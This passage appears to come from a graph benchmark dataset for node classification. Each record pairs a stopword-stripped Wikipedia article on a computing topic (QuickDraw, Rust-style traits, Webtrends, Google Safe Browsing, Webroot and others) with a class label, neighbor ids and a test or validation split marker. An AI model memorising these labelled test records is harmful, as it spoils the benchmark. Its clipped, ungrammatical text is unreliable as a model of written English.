    "text": "QuickDraw:quickdraw quickdraw 2d graphics library associated application programming interface api core part classic mac os operating system initially written bill atkinson andy hertzfeld quickdraw still existed part libraries mac os x largely superseded modern quartz graphics system mac os x v10.4 quickdraw officially deprecated mac os x v10.5 applications using quickdraw make use added 64-bit support mac os x v10.8 quickdraw header support removed operating system applications using quickdraw still run os x 10.8 macos 10.12 however current versions xcode macos sdk contain header files compile programs quickdraw grounded apple lisa lisagraf early 1980s designed fit well pascal-based interfaces development environments early apple systems addition quickdraw raster graphics system defines pixel basic unit graphical information contrast vector graphics systems graphics primitives defined mathematical terms rasterized required display resolution raster system requires much less processing power however prevailing paradigm time quickdraw developed quickdraw defined key data structure graphics port grafport logical drawing area graphics could drawn obvious on-screen object corresponding grafport window entire desktop view could grafport off-screen ports could also exist grafport defined coordinate system quickdraw resolution 16 bits giving 65,536 unique vertical horizontal locations numbered -32,767 extreme left top +32,767 extreme right bottom window usually set top left corner content area located 0,0 associated grafport window content area include window frame drop shadow title bar quickdraw coordinates referred infinitely thin lines pixel locations actual pixel drawn space immediate right coordinate made easier programmers avoid graphical glitches caused off-by-one errors macintosh pixels square grafport default resolution 72 pixels per inch chosen match conventions established printing industry 72 points per inch quickdraw also contained number scaling mapping functions quickdraw maintained number global variables per process chief among current port originally simplified api since operations pertained current port os developed use global state also made quickdraw much harder integrate modern design approaches multi-threading pre-emptive multitasking address problems carbon api bridge mac os 9 mac os x added additional parameters routines allowing opaque storage thread information new non-polled event structure everything seen classic mac os screen drawn quickdraw library quite low level primitive objects draw objects except text may drawn using pen rectangular dimensions pattern color note pen rectangular axis-aligned diagonal lines end thicker horizontal vertical ones shapes may drawn filled framed using pattern color filled arc forms wedge text may drawn installed font variety stylistic variations size color depending selected font stored text scaled variety ways truetype fonts scale smoothly size whereas bitmap fonts usually scale well important feature quickdraw support transfer modes governed destination pixel value related previous value color object drawn set attributes pen text drawing associated grafport regions key data structure quickdraw define arbitrary set pixels rather like bitmap compressed form rapidly manipulated complex ways regions combined union subtracted difference xored form regions used within grafport clipping drawn filled framed like shape series framed shapes connected lines may combined region region need consist contiguous set pixels disconnected regions possible common although regions could allow powerful graphic manipulations limited current implementation restricts maximum region data storage size sixteen bit value practical general-purpose drawing composition tool practical use high resolution also restricted regions underpin rest quickdraw permitting clipping arbitrary shapes essential implementation multiple overlapping windows invented bill atkinson regions patented separate invention apple region specified initial creation opening region drawing various quickdraw shapes closing region hidden routines construct region quickdraw commands executed bitmaps may also converted regions bitmaps may made regions painting filling region graphics port internal structure region storage length bounding rectangle opaque apple-published documents available though mechanism outlined patent regions implemented using vertical horizontal compression region stored series horizontal scan lines rasters contains vertical coordinate followed list horizontal inversion coordinates inversion point thought toggling inclusion region points first point turns region second turns compression achieved storing line differentially line contains differences previous line rather full set inversion points finally identical adjacent scan lines efficiently encoded simply skipping way commonly used region rounded corner rectangle efficiently encoded complex operations region composition image clipping may done without requiring either extensive processor cycles large amounts memory original systems executing quickdraw code used processors operating 8 megahertz clock rates systems 128 kilobytes writable memory regions bound specific orientation ninety degree rotation region would require detailed reverse engineering structure extensive coding general rotation impractical compared rotating original source boundary description simply creating new region however api includes conversion routines bitmaps bitmaps may also rotated using well known methods various degrees image degradation depending upon angle chosen storage processor cycles available operation complexity algorithm apple recently carbon api defined regions opaque structure program compilation options series graphics calls quickdraw recorded structure called picture saved memory played back time reproducing graphics sequence playback time picture may placed new coordinates scaled picture saved disk form defines apple pict format entire bitmap pixmap referring color images may copied one grafport another scaling clipping known blitting copybits name function operation basis animation sprite-like effects mac quickdraw provides similar blitting function designed implement scrolling within grafport image port shifted new location without scaling clipping desired graphics primitive operation vectored stdprocs series function pointers stored grafport limited polymorphism permits individual operations overridden replaced custom functions allowing printer drivers intercept graphics commands translate suitable printer operations way quickdraw rendered using postscript fact enabled macintosh practically invent desktop publishing similar subclass window data structure began associated grafport thus basically making windows exchangeable grafport convenient could source programming errors quickdraw started life lisagraf part apple lisa development macintosh initially simplified later extended originally quickdraw grafports supported bit depth 1 one bit per pixel black white suited built-in screen early macintosh fixed size 512×342 pixels limited color supported using crude planar model allowing quickdraw drive types dot-matrix printer used multi-colored ribbons applications supported feature 1987 macintosh ii developed launched designed conventional three-box design computer monitor keyboard separate monitor separate larger original mac video architecture necessarily change addition mac ii took macintosh black-and-white full color apple also decided time support seamless desktop spanning multiple monitors industry first thus color quickdraw significant extension original quickdraw created original architecture lacked much provision expandability using series hacks apple developers managed make addition color new video architecture virtually seamless developers end users color quickdraw introduced new data structures including gdevices represent attached video card/monitor new color grafport cgrafport structure handle color well pixmaps instead bitmaps multiple bits-per-pixel images one hacks compatibility used new structure exactly size old one data members place additional handles pointers color structures place bitmap fields upper two bits rowbytes field pressed use flags distinguish grafport cgrafport always zero old-style grafports bitmap could never feasibly wide ever set bits use two high bits would come back haunt quickdraw later forced maximum row width 4,095 32-bit pixmaps became problematic high-resolution graphics work later development carbon eliminated limitation fully backward compatible palette manager also added color quickdraw managed arbitration colors indexed video devices graphics primitives operations remained either unchanged would operate color else new color versions black white apis added initially color quickdraw capable operating 1 2 4 8-bit video cards available time soon however 24-bit video cards appeared so-called true color quickdraw updated support 32 bits per pixel reality 24 bits 8 unused color data 32-bit quickdraw architecture always allowed however new apis necessary color data structures allowed color depth 1 2 4 8 15 24 bits yielding 2 4 16 256 32,768 16,777,216 colors respectively 4 16 256 scales grey quickdraw took care managing resampling colors available color depths actual video hardware transfer offscreen image buffers including optionally dithering images lower depth improve image quality set color sampling utilities also added programmers could generate optimal color palettes use indexed video devices architecture quickdraw always allowed creation grafports associated bitmaps pixmaps offscreen graphics could composed memory without visible immediately screen pixels could transferred offscreen ports screen using quickdraw blitting function copybits offscreen compositing workhorse games graphics-intensive applications however advent 32-bit quickdraw offscreen worlds created set hand programmer within application involving three separate fairly complex data structures cgrafport pixmap gdevice indexed devices color look-up table inverse could error prone 32-bit quickdraw os support handling added offscreen graphics world gworld video buffer pixmap gworld could stored main memory available unused parts video ram copying screen could optimized speed avoiding need transfer large amount pixel data across main memory bus advent quicktime quickdraw gained ability deal compressed raster data jpeg quicktime image compression manager integrated closely quickdraw particular image decompression calls full-fledged quickdraw drawing calls picture recorded compressed data would saved part picture display picture later drawn image compression manager also added integration colorsync color matching apart back-end changes optimize new processor architectures powerpc quickdraw remained largely unchanged throughout rest life classic mac os quickdraw gx quickdraw 3d shared quickdraw name able interoperate quickdraw pixmap picture data structures otherwise completely separate functionality mac os x quickdraw became part carbon api 2005 release mac os x 10.4 quickdraw officially deprecated 2010 macpaint 1.3 source code release computer history museum historical version quickdraw source code became available",
    "neighbors": [
      1152,
      4741,
      1542,
      137,
      3598,
      143,
      2319,
      5520,
      4114,
      10512,
      11037,
      6048,
      11171,
      3367,
      3241,
      7849,
      7983,
      8114,
      9778,
      8628,
      11574,
      1592,
      10173,
      576,
      713,
      9418,
      9035,
      213,
      9430,
      3167,
      6377,
      4844,
      1389,
      8303,
      5619,
      2676,
      8700,
      7163,
      3324,
      3197
    ],
    "mask": "Test"
  },
  {
    "node_id": 9701,
    "label": 9,
    "text": "Trait_(computer_programming):trait computer programming computer programming trait concept used object-oriented programming represents set methods used extend functionality class traits provide set methods implement behaviour class require class implement set methods parameterize provided behaviour inter-object communication traits somewhat object-oriented protocol interface mixin interface may define one behaviors via method signatures trait defines behaviors via full method definitions i.e. includes body methods contrast mixins include full method definitions may also carry state member variable traits usually n't hence object defined trait created composition methods used classes without requiring multiple inheritance case naming collision one trait used class method name programmer must explicitly disambiguate one methods used class thus manually solving diamond problem multiple inheritance different composition methods object-oriented programming conflicting names automatically resolved scoping rules whereas mixins composed using inheritance operation traits offer much wider selection operations including traits composed following ways traits come originally programming language self supported following programming languages example uses trait enhance classes allows simulating aspects multiple inheritance trait rust declares set methods type must implement rust compilers require traits explicated ensures safety generics rust also helps avoid major problems templates c++ // type must ord trait // operations done fn get_max ord option simplify tedious repeated implementation traits like codice_3 codice_4 codice_5 used request compilers generate certain implementations automatically derivable traits include codice_6 codice_7 codice_3 codice_9 codice_10 codice_11 codice_12 codice_4 codice_14",
    "neighbors": [
      3462,
      8582,
      6154,
      10510,
      9245,
      11688,
      5165,
      5677,
      6074,
      10555,
      6718,
      8644,
      7292,
      7889,
      11610,
      476,
      2666,
      8554,
      7148,
      3442,
      3705,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 9702,
    "label": 0,
    "text": "Automatic_acquisition_of_sense-tagged_corpora:automatic acquisition sense-tagged corpora knowledge acquisition bottleneck perhaps major impediment solving word sense disambiguation wsd problem unsupervised learning methods rely knowledge word senses barely formulated dictionaries lexical databases supervised learning methods depend heavily existence manually annotated examples every word sense requisite met handful words testing purposes done senseval exercises therefore one promising trends wsd research using largest corpus ever accessible world wide web acquire lexical information automatically wsd traditionally understood intermediate language engineering technology could improve applications information retrieval ir case however reverse also true web search engines implement simple robust ir techniques successfully used mining web information employed wsd direct way using web corpora enhance wsd performance automatic acquisition sense-tagged corpora fundamental resource feed supervised wsd algorithms although far commonplace wsd literature number different effective strategies achieve goal already proposed strategies automatic extraction examples train supervised learning algorithms reviewed far best explored approach mine web word sense disambiguation results certainly encouraging however several open research issues related use web examples wsd besides automatic acquisition examples web wsd experiments profited web clear however research opportunities remain largely unexplored instance little known use lexical information extracted web knowledge-based wsd systems also hard find systems use web-mined parallel corpora wsd even though already efficient algorithms use parallel corpora wsd",
    "neighbors": [
      7599,
      538,
      5781,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9703,
    "label": 3,
    "text": "Thexder:thexder thexder player controls fighter robot able transform jet originally released 1985 nec pc-8801 platform japan game arts licensed thexder square order develop conversion nintendo entertainment system nes game console 1987 game arts also developed thexder conversion msx platform game licensed sierra entertainment release united states 1987 sierra ported game multiple platforms including ibm pc tandy color computer 3 apple ii apple iigs apple macintosh tandy 1000 computer became company best-selling title 1987 1988 activision released game europe commodore amiga 1990 game sold one million copies worldwide thexder quickly became best-selling hit selling 500,000 copies pc8801 platform popular japan despite home market success thexder garnered little attention abroad initially conversion msx best selling platform brazil many east european countries became international hit compute praised apple iigs version thexder computer first true arcade game excellent play value dollar 1988 games machine gave amiga version 74 score 1991 dragon gave macintosh pc/ms-dos versions game 4 5 stars game went sell one million copies worldwide becoming game arts biggest selling title 1987 thexder considered important breakthrough title run-and-gun shooter game genre paving way titles contra metal slug",
    "neighbors": [
      576,
      8937,
      9773,
      9006,
      2159,
      9166,
      10931,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 9704,
    "label": 4,
    "text": "WeProtect:weprotect weprotect styled weprotect global alliance led uk government founded baroness joanna shields supported 84 countries 24 technology companies 20 civil society organisations weprotect mission stop global crime online child sexual abuse exploitation 22 july 2013 then-prime minister david cameron made speech regarding proliferation accessibility child abuse images internet cracking online pornography prime minister announced new uk-us taskforce would created lead global alliance biggest internet companies tackle indecent images children online joanna shields prime minister advisor digital industries would head initiative working uk us governments law enforcement agencies technology industry maximise international efforts october 2013 announced damian green hmg minister policing criminal justice victims would travelling us joanna shields formalise arrangements task force meet us attorney general leading internet companies 18 november 2013 prime minister hosted internet safety summit 10 downing street joanna shields discuss done block child abuse content protect children harmful material online participants including leading search engines internet service providers national crime agency internet watch foundation nspcc discussed rid internet child sexual abuse exploitation summit internet safety communiqué issued setting agreed-upon action 13 december 2013 policing minister damian green us acting assistant attorney general mythili raman joanna shields launched first meeting us-uk taskforce counter online child exploitation ’ next year chair taskforce joanna shields responsible bringing together experts government industry law enforcement academia sides atlantic combat child sexual exploitation crimes internet reduce volume indecent images children online april 2014 home office minister damian green addressed nspcc child safety conference government work stamp online sexual exploitation revealed government working major industry players google microsoft pilot make even tougher pedophiles share child abuse images also told conference google launched programme embed engineers internet watch foundation speech encouraged internet companies innovate order fight online child sexual exploitation announced joanna shields would leading industry solutions event part us-uk taskforce event would bring together experts across technology sector come innovative solutions end sharing indecent images interacting adults children sexual purposes online may 2014 industry solutions event weprotect 2014 took place grey inn london attendance 67 technology specialists innovators 48 world leading technology companies event led national crime agency ceop home office delivered brandfuel facilitated pa consulting solutions event started hackathon leading internet technology cyber intelligence companies working develop breakthrough technology concepts could assist prevention investigation online child abuse protection victims event successfully laid foundation new model collaboration across industry harnessing diverse range technical skills knowledge experience tackle sharing indecent images grooming children sexual purposes uk prime minister hosted weprotect global summit london december 2014 summit gathered government leaders leading technology companies civil society organisations galvanise action end online child sexual exploitation home secretary opened summit speaking scale abuse uk combat prime minister keynote speaker second day alongside raft measures technical innovations tackle use internet view share indecent images prime minister announced uk would work unicef develop new global child protection fund uk would making £50 million contribution fund five-year period keith bristow director general national crime agency also spoke summit addressed need law enforcement civil society technology industry work together minimise risk children maximise risk offenders joanna shields prime minister digital adviser spoke importance technology industry using talents skills capacity innovation tackle online child exploitation also delivered report milestones industry partners course 2014 attendees also heard executives microsoft google ey visa presented contributions weprotect pledged continue developing concepts emerged may workshop including blocking viewing illegal material browser level internet interaction risk scoring victim identification tool system children report self-generated indecent images also announced united arab emirates would hosting another conference 2015 ensure global response comes fruition end summit four ambitious statements action published date signed 50 countries 20 companies 10 civil society organisations follow-up weprotect industry event took place september 2015 speaking event uk minister internet safety security baroness joanna shields delivered message continued support initiative vital importance broad global coalition willing coming together share information collaborate best protect children online industry delegates also heard representatives weprotect initiative including google facebook microsoft milestones achieved companies preventing sexual abuse images appearing search results identifying online grooming detecting removing videos children abused 16–17 november 2015 united arab emirates hosted second weprotect global summit abu dhabi may 2016 weprotect founder baroness joanna shields announced weprotect merged global alliance child sexual abuse online “ create first time single organisation influence expertise resources transform online child sexual exploitation dealt worldwide ” july 2016 weprotect global alliance launched new fund end violence children united nations deliver global program capacity capability initial donation £40 million uk government fund hosted unicef weprotect global alliance board responsible advising prioritize activities maximum impact may 2017 press conference rome pontifical gregorian university collaboration centre child protection institute psychology partnership weprotect global alliance telefono azzurro announced 3–6 october 2017 would host world congress entitled 'child dignity digital world announced invitation-only congress brings together distinguished academic experts business leaders leaders civil society high-level politicians religious representatives across globe provides historic opportunity set global agenda fight online sexual child abuse child protection digital world leadership advisory board",
    "neighbors": [
      7547,
      10446
    ],
    "mask": "Test"
  },
  {
    "node_id": 9705,
    "label": 4,
    "text": "Xceedium:xceedium xceedium inc. network security software company providing privileged identity access management solutions subsequently acquired ca technologies software used control manage risks privileged users privileged accounts admin root etc privileged credentials passwords certificates digital keys etc pose systems data xceedium inc. founded 2000 david van david cheung company split lucid technologies group company created 1995 company developed software internal use provided consultants secure remote access sensitive customer systems software became core technology xceedium gatekeeper product xceedium products aimed mid-large sized enterprises vertical market segments including banking financial services retail telecom healthcare energy government agencies marketed product global partner network xceedium headquarters originally located jersey city new jersey relocated northern virginia march 2011 initial funding venture-backed company came arrowpath venture partners nationwide mutual capital xceedium private venture capital backed company funding arrowpath venture partners nationwide mutual capital june 2012 xceedium closed 12 million financing led arrowpath venture partners bringing total capital raised 25m xceedium acquired ca technologies august 2015 xceedium gatekeeper first product designed company initially built out-of-band in-band kvm remote control gatekeeper software updated provide network-based access control session recording/playback later gatekeeper cloakware password authority product acquired irdeto integrated form xceedium xsuite main capabilities xceedium xsuite role-based access control command filtering white/black list user containment prevents ssh based leapfrogging rdp hopping unauthorized nodes session monitoring/policy violation alerting session recording playback privileged password vaulting management xceedium xsuite platform enabled organizations apply principle least privilege holds systems individuals granted access resources commands absolutely necessary required task according company xsuite limited access privileged users systems commands explicitly authorized role-based access control also monitored activities privileged users sent alerts individuals attempted violate policy system recorded privileged user sessions telnet rdp ssh vnc provided mechanism replay recorded session investigations forensics xsuite cloud amazon web services aws introduced extension xsuite platform provided privileged identity access management standalone aws implementations hybrid architectures include infrastructure nodes e.g. servers network devices storage devices security systems running aws amazon elastic compute cloud ec2 private clouds virtual machines traditional single os/hardware scenarios following acquisition xceedium ca xceedium xsuite integrated ca product range ca privileged access manager",
    "neighbors": [
      10341,
      11112,
      939,
      7248,
      210,
      10835,
      10747
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9706,
    "label": 3,
    "text": "HP_Serviceguard:hp serviceguard hp serviceguard formerly known mc/serviceguard high-availability cluster software produced hp runs hp-ux linux serviceguard existed since 1990 hp claims first high availability solution unix linux port called sg/lx existed since 1999 briefly suspended reintroduced june 2012",
    "neighbors": [
      5384,
      823,
      9455,
      5492,
      3927,
      1304
    ],
    "mask": "Test"
  },
  {
    "node_id": 9707,
    "label": 3,
    "text": "Micro-operation:micro-operation computer central processing units micro-operations also known micro-ops μops detailed low-level instructions used designs implement complex machine instructions sometimes termed macro-instructions context usually micro-operations perform basic operations data stored one registers including transferring data registers registers external buses central processing unit cpu performing arithmetic logical operations registers typical fetch-decode-execute cycle step macro-instruction decomposed execution cpu determines steps series micro-operations execution micro-operations performed control cpu control unit decides execution performing various optimizations reordering fusion caching various forms μops long basis traditional microcode routines used simplify implementation particular cpu design perhaps sequencing certain multi-step operations addressing modes recently μops also employed different way order let modern cisc processors easily handle asynchronous parallel speculative execution traditional microcode one table lookups equivalent done locate appropriate μop-sequence based encoding semantics machine instruction decoding translation step however instead rigid μop-sequences controlling cpu directly microcode-rom μops dynamically buffered rescheduling executed buffering means fetch decode stages detached execution units feasible traditional microcoded hard-wired design allows degree freedom regarding execution order makes extraction instruction level parallelism normal single-threaded program possible provided dependencies checked etc. opens analysis therefore also reordering code sequences order dynamically optimize mapping scheduling μops onto machine resources alus load/store units etc. happens μop-level sub-operations different machine macro instructions may often intermix particular μop-sequence forming partially reordered machine instructions direct consequence out-of-order dispatching microinstructions several macro instructions however micro-op fusion aims fact complex microinstruction may replace simpler microinstructions certain cases typically order minimize state changes usage queue reorder buffer space therefore reducing power consumption micro-op fusion used modern cpu designs execution optimization gone even processors translate many machine instructions series μops also opposite appropriate combine certain machine instruction sequences compare followed conditional jump complex μop fits execution model better thus executed faster less machine resources involved also known macro-op fusion another way try improve performance cache decoded micro-operations macroinstruction executed processor directly access decoded micro-operations special cache instead decoding execution trace cache found intel netburst microarchitecture pentium 4 widespread example technique size cache may stated terms many thousands micro-operations store kμops",
    "neighbors": [
      7173,
      6151,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      9330,
      6268,
      3197,
      1677,
      7313,
      6804,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      2237,
      4286,
      2241,
      6339,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      2805,
      3317,
      249,
      7421,
      7941,
      1798,
      1801,
      6926,
      6415,
      11539,
      3352,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      11130,
      3457,
      3470,
      5518,
      8590,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      7657,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9708,
    "label": 8,
    "text": "Webtrends:webtrends webtrends private company headquartered portland oregon united states provides digital analytics optimization software related digital marketing e-commerce provides services approximately 2,000 companies w. glen boyd eli shapira founded company 1993 e.g software netiq bought 2001 2001-2005 interval netiq released new version webtrends reporting center version 5.0 october 31 2007 three corporate vice presidents ceo asked resign although initial speculation company quickly sold largest competitor later reports indicated change signaled long-term move february 2014 company hired joe davis new ceo may 2014 company moved headquarters pacific first center u.s. bancorp tower downtown portland 2009 webtrends launched transit ad campaign revolving around whether cyclists pay road tax ad asked cyclists pay road tax drivers cycling community reacted strongly ad strident opinion sides debate aim campaign demonstrate ability company web analytics track resulting online commentary around issue webtrends acquired clickshift automated optimization product online advertising december 2006 webtrends acquired seattle based widemile provider multivariate testing targeting july 30 2009 product rebranded relaunched webtrends optimize day acquisition made public webtrends acquired san francisco based transpond maker social microsites applications distributed web facebook august 10 2010 product rebranded webtrends apps time announcement later rebranded webtrends social webtrends acquired reinvigorate culver city ca based media temple ventures reinvigorate developed real time analytics web product visit heat mapping technologies product rebranded webtrends reinvigorate later discontinued webtrends offers variety web analytics products services focus collection presentation user behavior data websites mobile device applications new york times described company offerings products analyze spending web site visitors core product webtrends analytics available software software service saas models years webtrends released number saas products including webtrends segments webtrends optimize action center webtrends streams webtrends ads 2012 integration deal linked webtrends hootsuite 2013-released email remarketing tool helps online marketers deal in-the-moment data abandonment virtual shopping carts potential customers february 2015 webtrends completed worldwide rollout webtrends explore ad-hoc analytics application 2016 webtrends announced would release new analytics product webtrends infinity analytics year later sold oracle software utilizes log file analysis page tagging log analysis reads files web server records transactions via page tagging parameter name-value pairs appended either automatically javascript tag manual hand-coding query string gif image resides data collection server visitor loads page browser browser sends request data collection server may load gif image data collection server receives request logs parameters included query string gif image software analyzes organizes captured data reports configured 'profile reports viewable various means commonly web-based graphic user interface scheduled emailed export report pdf csv format collected data also viewed via raw log file delivery rest odbc queries products utilize webtrends data extraction api web-based report presentation interface highly configurable allowing webtrends administrator specify information analyzed presented available viewing 2008 new york times already owned international herald tribune used webtrends analyze visitors iht site arrived data collection process facilitated finding importance search engines",
    "neighbors": [
      6576,
      467,
      10804,
      8627,
      1943
    ],
    "mask": "None"
  },
  {
    "node_id": 9709,
    "label": 2,
    "text": "Recovery_Console:recovery console recovery console feature windows 2000 windows xp windows server 2003 operating systems provides means administrators perform limited range tasks using command line interface primary function enable administrators recover situations windows boot far presenting graphical user interface recovery console used provide way access hard drive emergency command prompt recovery console accessed either original installation media used install windows also installed hard drive added ntldr menu however relying latter risky requires computer boot point ntldr loads recovery console simple command-line interpreter cli many available commands closely resemble commands normally available codice_1 namely codice_2 codice_3 codice_4 forth recovery console administrator filesystem access recovery console default severely limited administrator using recovery console read-only access volumes except boot volume even boot volume access root directory windows system directory e.g \\winnt changed changing security policies enable read/write access complete file system including copying files removable media i.e floppy drives although appears list commands available using codice_9 command many articles recovery console including authored microsoft codice_10 command available protocol stacks loaded way connect shared folder remote computer implied",
    "neighbors": [
      11270,
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      9791,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      2181,
      6281,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      5300,
      9910,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      1741,
      1750,
      9946,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      2811,
      6396,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      1844,
      9525,
      11572,
      10039,
      1337,
      6972,
      5437,
      3394,
      8517,
      3922,
      4439,
      5465,
      5985,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      5500,
      2943,
      3970,
      10631,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      10727,
      4074,
      6637,
      2545,
      6641,
      11249,
      8692,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 9710,
    "label": 0,
    "text": "Requirements_Modeling_Framework:requirements modeling framework requirements modeling framework rmf open-source software framework working requirements based reqif standard rmf consists core allowing reading writing manipulating reqif data user interface allowing inspect edit request data rmf first currently open-source reference implementation reqif standards noteworthy fact rmf already deployed prostep reqif implementor forum order ensure interoperability commercial implementation since 2011 reports german international press rmf rmf development name pror since 2009 scope deploy research project collaborative efforts quickly developed research project verde resulting significant acceleration development point data model based rif predecessor reqif june 2011 proposal created transform code eclipse foundation project proposal adopted november 2011 part migration eclipse foundation conversion rif current version reqif 1.0.1 spring 2012 deploy verde opted research projects nevertheless rmf keeps evolving within framework research project advance formal mind free extensions pror name pror essentials developed currently neither version 0.14 0.13 integrated latest version eclipse neither pror rmf version 0.10.0 remains reasons unknown version 0.13 release folder version 0.14 latest folder integrated eclipse version mars.2 release 4.5.2 rmf core allows storing writing validating manipulating reqif files manipulation data implemented programmatically using emf pror additionally enables interactive creation inspecting editing reqif models requirements presented configurable tables links requirements created via drag drop context menus pror designed integration eclipse-based tools extension point available makes possible integrate available renderers editors react drag drop events outside part deploy advance integration event-b models developed topcased -project suggested integrated rmf integrations proposed implemented prototype",
    "neighbors": [
      9345,
      4483,
      8581,
      9224,
      1801,
      4107,
      5774,
      5245,
      5404,
      10909,
      10658,
      939,
      7983,
      8122,
      11457,
      8262,
      9926,
      3529,
      9932,
      10061,
      5585,
      11474,
      2901,
      9688,
      731,
      7775,
      11487,
      7780,
      2283,
      5612,
      9714,
      2804,
      2294,
      119,
      10617,
      5373,
      2558,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 9711,
    "label": 5,
    "text": "Network-based_Call_Signaling:network-based call signaling network-based call signaling ncs profile media gateway control protocol mgcp use packetcable applications voice-over-ip network implementing ncs designed according media gateway control protocol architecture interconnecting packet network traditional public switched telephone network pstn architecture physically decomposes functionality providing complete end-to-end multimedia telecommunication sessions several discrete components notably media gateway mg located customer premises performs physical translation analog voice video streams packetized digital data media gateway controller mgc centralized server controls typically many media gateways manages complexity call setup resource negotiation call routing tear-down addition architecture also uses signaling gateways traditional telecommunication channels ss7-based networks like mgcp ncp device control protocol defining interaction mgc also called call agent media gateways one layer packetcable suite specifications relies upon companion protocol specifications provide complete end-to-end telecommunication functionality network-based call signaling modification media gateway control protocol mgcp ncs provides packetcable profile application programming interface mgci corresponding protocol mgcp controlling voice-over-ip voip embedded clients external call control elements embedded client network element provides mgci functions provide connection control endpoint control auditing status reporting use system model naming conventions modification mgcp ncs profile include following ncs aims supporting packetcable-embedded clients functionality present mgcp 1.0 protocol superfluous ncs removed contains extensions modifications mgcp however mgcp architecture mgcp constructs relevant embedded clients preserved ncs ncs protocol contains minor simplifications mgcp 1.0",
    "neighbors": [
      7681,
      5843
    ],
    "mask": "Test"
  },
  {
    "node_id": 9712,
    "label": 4,
    "text": "Google_Safe_Browsing:google safe browsing google safe browsing blacklist service provided google provides lists urls web resources contain malware phishing content google chrome safari firefox vivaldi gnome web browsers use lists google safe browsing service checking pages potential threats google also provides public api service google also provides information internet service providers sending e-mail alerts autonomous system operators regarding threats hosted networks according google september 2017 3 billion internet devices protected service google maintains safe browsing lookup api privacy drawback urls looked hashed server knows urls api users looked safe browsing update api hand compares 32-bit hash prefixes url preserve privacy chrome firefox safari browsers use latter safe browsing also stores mandatory preferences cookie computer google safe browsing conducts client-side checks website looks suspicious sends subset likely phishing social engineering terms found page google obtain additional information available google servers whether website considered malicious logs including ip address one cookies kept two weeks tied safe browsing requests made device websites carrying ads infected might blacklisted google safe browsing even website malware request removal blacklist requires webmaster create google webmaster tool account take several days removed",
    "neighbors": [
      4096,
      8719,
      3600,
      7700,
      9244,
      10284,
      3633,
      4683,
      11343,
      3664,
      8285,
      2658,
      4722,
      115,
      8821,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      1203,
      9908,
      7359,
      196,
      3269,
      3782,
      7370,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      236,
      9970,
      7926,
      3836,
      5892,
      8455,
      10009,
      7965,
      798,
      5407,
      288,
      10525,
      4901,
      7983,
      5431,
      2875,
      10045,
      11590,
      11592,
      9039,
      3409,
      7515,
      5483,
      7548,
      1409,
      2945,
      3971,
      4995,
      9610,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      3499,
      7595,
      1994,
      4044,
      4048,
      5078,
      5082,
      6632,
      5100
    ],
    "mask": "Test"
  },
  {
    "node_id": 9713,
    "label": 4,
    "text": "Webroot:webroot webroot inc. private american company provides internet security consumers businesses company founded boulder colorado us headquartered broomfield colorado us operations san mateo san diego globally australia austria ireland japan united kingdom international headquarter located dublin ireland webroot founded 1997 steven thomas launched webroot first commercial product trace removal agent called webroot window washer investors include venture capital firms technology crossover ventures accel partners mayfield 2002 webroot launched spyware blocking removal product called webroot spy sweeper company introduced antivirus protection launch spy sweeper antivirus 2006 october 2007 webroot antivirus antispyware desktop firewall released added firewall protection feature webroot entered enterprise market 2004 launch webroot spy sweeper enterprise combined spy sweeper technology enables administrators deploy antispyware protection across entire network october 2008 webroot launched first consumer security suite webroot internet security essentials united states international release security suite followed early 2009 august 2009 webroot appointed new president ceo former ceo wily technology may 2010 webroot announced plans open international headquarters dublin ireland july 2010 webroot internet security complete 2011 released including antivirus antispyware protection firewall capabilities online back-up password management licensed lastpass protection identity theft credit card monitoring us customers september 2010 webroot opened regional office leidschendam netherlands primarily aimed distributing webroot enterprise security-as-a-service saas products businesses webroot mobile security android launched april 5 2011 smartphones tablets free basic version paid premium version app designed protect viruses apps threats delivered via web browsing threats created mobile devices lost secureanywhere products launched october 4 2011 mobile security offerings expanded include ios mobile operating system october 2011 webroot launched new generation products using prevx cloud technology included three basic products windows secureanywhere antivirus essentials complete 2012 security android ios mobile devices february 2012 products businesses added july 2014 webroot announced brightcloud security services new portfolio services enterprise-class businesses including integration next-generation firewalls siems september 2017 webroot appointed new president ceo former ceo lancope mike potts february 7 2019 carbonite 